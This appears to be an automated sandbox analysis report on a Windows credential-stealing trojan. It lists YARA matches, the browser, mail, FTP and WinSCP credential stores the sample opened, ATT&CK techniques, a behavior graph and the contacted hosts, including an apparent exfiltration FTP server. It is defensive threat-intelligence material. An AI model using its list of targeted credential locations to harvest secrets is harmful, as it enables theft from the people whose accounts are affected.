                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.newapp.exe.4eefd48.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.newapp.exe.427fd00.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iNFGd6bDZX.exe.425ef28.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.newapp.exe.4e6ee90.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iNFGd6bDZX.exe.4221d08.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.newapp.exe.4e6ee90.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.newapp.exe.427fd00.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.newapp.exe.4eefd48.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iNFGd6bDZX.exe.425ef28.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iNFGd6bDZX.exe.4221d08.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.2925773285.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2927028894.0000000002B7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1840585657.0000000004E6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2927556251.000000000340C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2927028894.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2918833865.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2927556251.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.1939852793.000000000427F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2925773285.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1840585657.0000000004EEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1726457785.0000000004221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: iNFGd6bDZX.exe PID: 7352, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: iNFGd6bDZX.exe PID: 7568, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 7984, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 8056, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 2032, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 4192, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.newapp.exe.4eefd48.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.newapp.exe.427fd00.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iNFGd6bDZX.exe.425ef28.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.newapp.exe.4e6ee90.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iNFGd6bDZX.exe.4221d08.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.newapp.exe.4e6ee90.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.newapp.exe.427fd00.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.newapp.exe.4eefd48.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iNFGd6bDZX.exe.425ef28.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iNFGd6bDZX.exe.4221d08.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.1840585657.0000000004E6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2927028894.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2918833865.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2927556251.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.1939852793.000000000427F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2925773285.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1840585657.0000000004EEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1726457785.0000000004221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: iNFGd6bDZX.exe PID: 7352, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: iNFGd6bDZX.exe PID: 7568, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 7984, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 8056, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 2032, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 4192, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.newapp.exe.4eefd48.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.newapp.exe.427fd00.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iNFGd6bDZX.exe.425ef28.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.newapp.exe.4e6ee90.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iNFGd6bDZX.exe.4221d08.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.newapp.exe.4e6ee90.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.newapp.exe.427fd00.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.newapp.exe.4eefd48.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iNFGd6bDZX.exe.425ef28.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iNFGd6bDZX.exe.4221d08.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.2925773285.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2927028894.0000000002B7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1840585657.0000000004E6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2927556251.000000000340C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2927028894.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2918833865.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2927556251.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.1939852793.000000000427F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2925773285.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1840585657.0000000004EEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1726457785.0000000004221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: iNFGd6bDZX.exe PID: 7352, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: iNFGd6bDZX.exe PID: 7568, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 7984, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 8056, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 2032, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 4192, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      11
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      1
                      File and Directory Discovery
                      Remote Services1
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      1
                      Exfiltration Over Alternative Protocol
                      Abuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      Registry Run Keys / Startup Folder
                      112
                      Process Injection
                      3
                      Obfuscated Files or Information
                      11
                      Input Capture
                      24
                      System Information Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Registry Run Keys / Startup Folder
                      2
                      Software Packing
                      1
                      Credentials in Registry
                      1
                      Query Registry
                      SMB/Windows Admin Shares1
                      Email Collection
                      2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      DLL Side-Loading
                      NTDS211
                      Security Software Discovery
                      Distributed Component Object Model11
                      Input Capture
                      23
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Masquerading
                      LSA Secrets2
                      Process Discovery
                      SSH1
                      Clipboard Data
                      Fallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
                      Virtualization/Sandbox Evasion
                      Cached Domain Credentials141
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items112
                      Process Injection
                      DCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Hidden Files and Directories
                      Proc Filesystem1
                      System Network Configuration Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588699 Sample: iNFGd6bDZX.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 49 ftp.ercolina-usa.com 2->49 51 ercolina-usa.com 2->51 53 api.ipify.org 2->53 69 Suricata IDS alerts for network traffic 2->69 71 Found malware configuration 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 6 other signatures 2->75 8 iNFGd6bDZX.exe 4 2->8         started        12 newapp.exe 3 2->12         started        14 newapp.exe 2->14         started        signatures3 process4 file5 43 C:\Users\user\AppData\...\iNFGd6bDZX.exe.log, ASCII 8->43 dropped 77 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->77 79 Adds a directory exclusion to Windows Defender 8->79 81 Injects a PE file into a foreign processes 8->81 16 iNFGd6bDZX.exe 16 5 8->16         started        21 powershell.exe 23 8->21         started        23 iNFGd6bDZX.exe 8->23         started        83 Multi AV Scanner detection for dropped file 12->83 85 Machine Learning detection for dropped file 12->85 25 newapp.exe 14 2 12->25         started        27 newapp.exe 12->27         started        29 newapp.exe 12->29         started        31 newapp.exe 14->31         started        33 newapp.exe 14->33         started        signatures6 process7 dnsIp8 45 ercolina-usa.com 192.254.225.136, 21, 36065, 38674 UNIFIEDLAYER-AS-1US United States 16->45 47 api.ipify.org 104.26.12.205, 443, 49732, 49740 CLOUDFLARENETUS United States 16->47 39 C:\Users\user\AppData\Roaming\...\newapp.exe, PE32 16->39 dropped 41 C:\Users\user\...\newapp.exe:Zone.Identifier, ASCII 16->41 dropped 55 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->55 57 Tries to steal Mail credentials (via file / registry access) 16->57 59 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->59 61 Loading BitLocker PowerShell Module 21->61 35 WmiPrvSE.exe 21->35         started        37 conhost.exe 21->37         started        63 Tries to harvest and steal ftp login credentials 31->63 65 Tries to harvest and steal browser information (history, passwords, etc) 31->65 67 Installs a global keyboard hook 31->67 file9 signatures10 process11

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      iNFGd6bDZX.exe72%VirustotalBrowse
                      iNFGd6bDZX.exe63%ReversingLabsWin32.Trojan.Generic
                      iNFGd6bDZX.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\newapp\newapp.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\newapp\newapp.exe63%ReversingLabsWin32.Trojan.Generic
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://ftp.ercolina-usa.com0%Avira URL Cloudsafe
                      http://ercolina-usa.com0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ercolina-usa.com
                      192.254.225.136
                      truetrue
                        unknown
                        api.ipify.org
                        104.26.12.205
                        truefalse
                          high
                          ftp.ercolina-usa.com
                          unknown
                          unknowntrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://api.ipify.org/false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.apache.org/licenses/LICENSE-2.0iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.comiNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designersGiNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fontbureau.com/designers/?iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.founder.com.cn/cn/bTheiNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://account.dyn.com/iNFGd6bDZX.exe, 00000000.00000002.1726457785.0000000004221000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1840585657.0000000004E6E000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1840585657.0000000004EEF000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2918833865.0000000000436000.00000040.00000400.00020000.00000000.sdmp, newapp.exe, 0000000C.00000002.1939852793.000000000427F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.fontbureau.com/designers?iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.tiro.comiNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.fontbureau.com/designersiNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.goodfont.co.kriNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://api.ipify.org/tiNFGd6bDZX.exe, 00000005.00000002.2927556251.0000000003391000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2927028894.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000E.00000002.2925773285.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://ftp.ercolina-usa.comiNFGd6bDZX.exe, 00000005.00000002.2927556251.000000000340C000.00000004.00000800.00020000.00000000.sdmp, iNFGd6bDZX.exe, 00000005.00000002.2927556251.000000000346B000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2927028894.0000000002B7C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000E.00000002.2925773285.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://ercolina-usa.comiNFGd6bDZX.exe, 00000005.00000002.2927556251.000000000340C000.00000004.00000800.00020000.00000000.sdmp, iNFGd6bDZX.exe, 00000005.00000002.2927556251.000000000346B000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2927028894.0000000002B7C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000E.00000002.2925773285.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.carterandcone.comliNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.sajatypeworks.comiNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.typography.netDiNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.fontbureau.com/designers/cabarga.htmlNiNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.founder.com.cn/cn/cTheiNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.galapagosdesign.com/staff/dennis.htmiNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
